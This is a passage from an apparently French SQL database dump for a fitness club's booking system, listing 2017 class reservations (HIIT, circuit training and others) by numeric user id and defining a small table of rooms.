(9767, 282, 'CTR', '2017-05-29', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9768, 282, 'CTR', '2017-05-29', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9769, 132, 'CTR', '2017-05-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9770, 132, 'CTR', '2017-05-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9771, 132, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9772, 132, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9773, 48, 'CTR', '2017-05-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9774, 48, 'CTR', '2017-05-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9777, 230, 'CTR', '2017-05-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9776, 31, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9778, 230, 'CTR', '2017-05-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9779, 48, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9780, 92, 'CTR', '2017-05-30', '19h30', '20h15', 'Groupe Privé'),
(9781, 231, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9782, 264, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9783, 264, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9784, 265, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9785, 265, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9786, 265, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9787, 265, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9788, 281, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9789, 281, 'CTR', '2017-05-30', '19h00', '19h30', 'Duo Training'),
(9790, 195, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9791, 177, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9792, 283, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9793, 231, 'CTR', '2017-05-31', '18h15', '18h45', 'Circuit Training'),
(9794, 247, 'CTR', '2017-05-31', '19h ', '19h30', 'Circuit training'),
(9795, 247, 'CTR', '2017-05-31', '19h ', '19h30', 'Circuit training'),
(9796, 173, 'CTR', '2017-05-31', '19h ', '19h30', 'Circuit training'),
(9797, 213, 'CTR', '2017-05-31', '19h45', '20h15', 'Groupe Privé'),
(9815, 132, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9799, 191, 'CTR', '2017-06-01', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9800, 283, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9835, 247, 'CTR', '2017-06-07', '19h ', '19h30', 'Circuit training'),
(9802, 230, 'CTR', '2017-06-01', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9805, 262, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9804, 31, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9814, 132, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9808, 132, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9809, 177, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9810, 48, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9811, 180, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9812, 205, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9813, 3, 'CTR', '2017-06-02', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9816, 132, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9817, 286, 'CTR', '2017-06-07', '19h ', '19h30', 'Circuit training'),
(9818, 285, 'CTR', '2017-06-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9819, 205, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9820, 48, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9821, 31, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9854, 80, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9823, 177, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9824, 283, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9825, 261, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9826, 288, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9827, 289, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9828, 288, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9829, 289, 'CTR', '2017-06-09', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9830, 48, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9831, 177, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9832, 283, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9833, 231, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9836, 247, 'CTR', '2017-06-07', '19h ', '19h30', 'Circuit training'),
(9837, 173, 'CTR', '2017-06-07', '19h ', '19h30', 'Circuit training'),
(9838, 255, 'CTR', '2017-06-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9839, 287, 'CTR', '2017-06-07', '19h ', '19h30', 'Circuit training'),
(9840, 193, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9841, 193, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9842, 193, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9843, 31, 'CTR', '2017-06-07', '18h15', '18h45', 'Circuit Training'),
(9844, 286, 'CTR', '2017-06-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9845, 230, 'CTR', '2017-06-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9846, 132, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9853, 231, 'CTR', '2017-06-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9848, 188, 'CTR', '2017-06-09', '12h45', '13h15', 'Circuit Training'),
(9870, 189, 'CTR', '2017-06-09', '12h45', '13h15', 'Circuit Training'),
(9871, 132, 'CTR', '2017-06-16', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9852, 205, 'CTR', '2017-06-09', '12h45', '13h15', 'Circuit Training'),
(9855, 80, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9879, 205, 'CTR', '2017-06-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9877, 205, 'CTR', '2017-06-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9858, 286, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9859, 286, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9860, 285, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9861, 285, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9862, 230, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9863, 230, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9864, 80, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9865, 80, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9866, 287, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9867, 287, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9868, 260, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9869, 260, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9872, 288, 'CTR', '2017-06-12', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9873, 288, 'CTR', '2017-06-12', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9876, 48, 'CTR', '2017-06-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9875, 48, 'CTR', '2017-06-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9880, 255, 'CTR', '2017-06-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9881, 132, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9882, 132, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9883, 210, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9926, 285, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9885, 48, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9886, 31, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9887, 177, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9888, 283, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9889, 231, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9890, 288, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9891, 195, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9892, 205, 'CTR', '2017-06-14', '18h15', '18h45', 'Circuit Training'),
(9893, 247, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9894, 247, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9895, 173, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9896, 286, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9897, 287, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9898, 188, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9899, 265, 'CTR', '2017-06-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9900, 265, 'CTR', '2017-06-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9901, 281, 'CTR', '2017-06-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9902, 281, 'CTR', '2017-06-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9903, 265, 'CTR', '2017-06-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9904, 265, 'CTR', '2017-06-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9905, 205, 'CTR', '2017-06-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9906, 205, 'CTR', '2017-06-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9907, 288, 'CTR', '2017-06-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9908, 288, 'CTR', '2017-06-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9909, 188, 'CTR', '2017-06-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9910, 231, 'CTR', '2017-06-19', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9911, 80, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9912, 80, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9913, 48, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9914, 48, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9915, 285, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9927, 193, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9917, 287, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9918, 287, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9919, 286, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9920, 286, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9921, 290, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9922, 285, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9923, 26, 'CTR', '2017-06-14', '19h ', '19h30', 'Circuit training'),
(9924, 230, 'CTR', '2017-06-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9925, 191, 'CTR', '2017-06-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9928, 193, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9929, 291, 'CTR', '2017-06-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9930, 291, 'CTR', '2017-06-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9931, 213, 'CTR', '2017-06-20', '19h00', '19h30', 'Duo Training'),
(9932, 284, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9933, 284, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9934, 132, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9935, 132, 'CTR', '2017-06-23', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9936, 230, 'CTR', '2017-06-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9937, 230, 'CTR', '2017-06-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9938, 230, 'CTR', '2017-06-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9939, 31, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9940, 48, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9941, 177, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9942, 283, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9943, 231, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9944, 288, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9945, 247, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9946, 247, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9947, 173, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9948, 287, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9949, 188, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9950, 290, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9951, 26, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9952, 286, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9953, 205, 'CTR', '2017-06-21', '19h ', '19h30', 'Circuit training'),
(9954, 241, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9955, 287, 'CTR', '2017-06-23', '12h45', '13h15', 'Circuit Training'),
(9956, 285, 'CTR', '2017-06-23', '12h45', '13h15', 'Circuit Training'),
(9957, 132, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9958, 132, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9960, 279, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9966, 48, 'CTR', '2017-06-23', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9962, 140, 'CTR', '2017-06-21', '18h15', '18h45', 'Circuit Training'),
(9972, 26, 'CTR', '2017-06-23', '12h45', '13h15', 'Circuit Training'),
(9973, 189, 'CTR', '2017-06-23', '12h45', '13h15', 'Circuit Training'),
(10000, 205, 'CTR', '2017-06-23', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9967, 31, 'CTR', '2017-06-23', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9968, 260, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9969, 260, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9970, 177, 'CTR', '2017-06-23', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9971, 286, 'CTR', '2017-06-23', '12h45', '13h15', 'Circuit Training'),
(9974, 205, 'CTR', '2017-06-23', '12h45', '13h15', 'Circuit Training'),
(10031, 132, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9976, 92, 'CTR', '2017-06-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10016, 255, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9978, 188, 'CTR', '2017-06-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9979, 292, 'CTR', '2017-06-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9980, 80, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9981, 80, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10029, 132, 'CTR', '2017-06-30', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(10030, 132, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9984, 48, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9985, 48, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9986, 230, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9987, 230, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9988, 193, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9989, 193, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9990, 290, 'CTR', '2017-06-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9991, 290, 'CTR', '2017-06-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9992, 205, 'CTR', '2017-06-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9993, 205, 'CTR', '2017-06-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9994, 288, 'CTR', '2017-06-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9995, 288, 'CTR', '2017-06-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9996, 291, 'CTR', '2017-06-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9997, 291, 'CTR', '2017-06-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9998, 281, 'CTR', '2017-06-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9999, 281, 'CTR', '2017-06-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10002, 31, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10003, 283, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10004, 177, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10005, 231, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10006, 288, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10007, 241, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10008, 205, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10028, 132, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10010, 247, 'CTR', '2017-06-28', '19h ', '19h30', 'Circuit training'),
(10011, 247, 'CTR', '2017-06-28', '19h ', '19h30', 'Circuit training'),
(10012, 173, 'CTR', '2017-06-28', '19h ', '19h30', 'Circuit training'),
(10013, 188, 'CTR', '2017-06-28', '19h ', '19h30', 'Circuit training'),
(10014, 287, 'CTR', '2017-06-28', '19h ', '19h30', 'Circuit training'),
(10015, 290, 'CTR', '2017-06-28', '19h ', '19h30', 'Circuit training'),
(10019, 283, 'CTR', '2017-06-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10018, 283, 'CTR', '2017-06-30', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(10033, 140, 'CTR', '2017-06-30', '12h45', '13h15', 'Circuit Training'),
(10022, 280, 'CTR', '2017-06-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10023, 280, 'CTR', '2017-06-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10024, 279, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10025, 279, 'CTR', '2017-06-30', '12h45', '13h15', 'Circuit Training'),
(10026, 287, 'CTR', '2017-06-30', '12h45', '13h15', 'Circuit Training'),
(10027, 188, 'CTR', '2017-06-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10032, 140, 'CTR', '2017-06-28', '18h15', '18h45', 'Circuit Training'),
(10034, 140, 'CTR', '2017-06-30', '12h45', '13h15', 'Circuit Training'),
(10035, 48, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10036, 48, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10037, 260, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10038, 260, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10039, 265, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10040, 265, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10067, 80, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10064, 205, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10043, 231, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10066, 293, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10065, 293, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10046, 281, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10047, 281, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10048, 288, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10049, 288, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10050, 286, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10051, 286, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10052, 290, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10053, 290, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10054, 26, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10055, 26, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10056, 280, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10057, 280, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10058, 230, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10059, 230, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10060, 279, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10061, 92, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10062, 193, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10063, 193, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10068, 80, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10069, 48, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10070, 26, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10071, 286, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10072, 290, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10073, 287, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10074, 285, 'CTR', '2017-07-05', '18h15', '18h45', 'Circuit Training'),
(10086, 287, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10076, 132, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10077, 132, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10078, 286, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10079, 286, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10080, 285, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10081, 285, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10082, 26, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10083, 26, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10084, 290, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10085, 290, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10087, 287, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10088, 48, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10089, 80, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10090, 205, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10091, 80, 'CTR', '2017-07-10', '18h15', '19h00', 'Circuit Training'),
(10092, 278, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10093, 278, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10105, 279, 'CTR', '2017-07-17', '18h15', '19h00', 'Circuit Training'),
(10095, 92, 'CTR', '2017-07-12', '18h15', '18h45', 'Circuit Training'),
(10097, 180, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10098, 294, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10104, 132, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10100, 80, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10101, 48, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10102, 31, 'CTR', '2017-07-12', '19h ', '19h30', 'Circuit training'),
(10106, 48, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10107, 48, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10108, 31, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10109, 31, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10110, 210, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10111, 205, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10112, 205, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10113, 180, 'CTR', '2017-07-19', '18h15', '18h45', 'Circuit Training'),
(10114, 132, 'CTR', '2017-07-19', '19h ', '19h30', 'Circuit training'),
(10117, 295, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training');

-- --------------------------------------------------------

--
-- Structure de la table `reservation_salle`
--

CREATE TABLE `reservation_salle` (
  `id` varchar(3) NOT NULL,
  `salle` varchar(250) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_salle`
--

INSERT INTO `reservation_salle` (`id`, `salle`) VALUES
('CTR', 'Cross Training'),
('PIS', 'NamTation'),
('XBO', 'XBody');

-- --------------------------------------------------------

--
-- Structure de la table `reservation_seance_complete`
--

CREATE TABLE `reservation_seance_complete` (
  `id` int(11) NOT NULL,
  `salle` varchar(3) NOT NULL,
  `date` date NOT NULL,
  `heure_debut` varchar(5) NOT NULL,
  `heure_fin` varchar(5) NOT NULL,
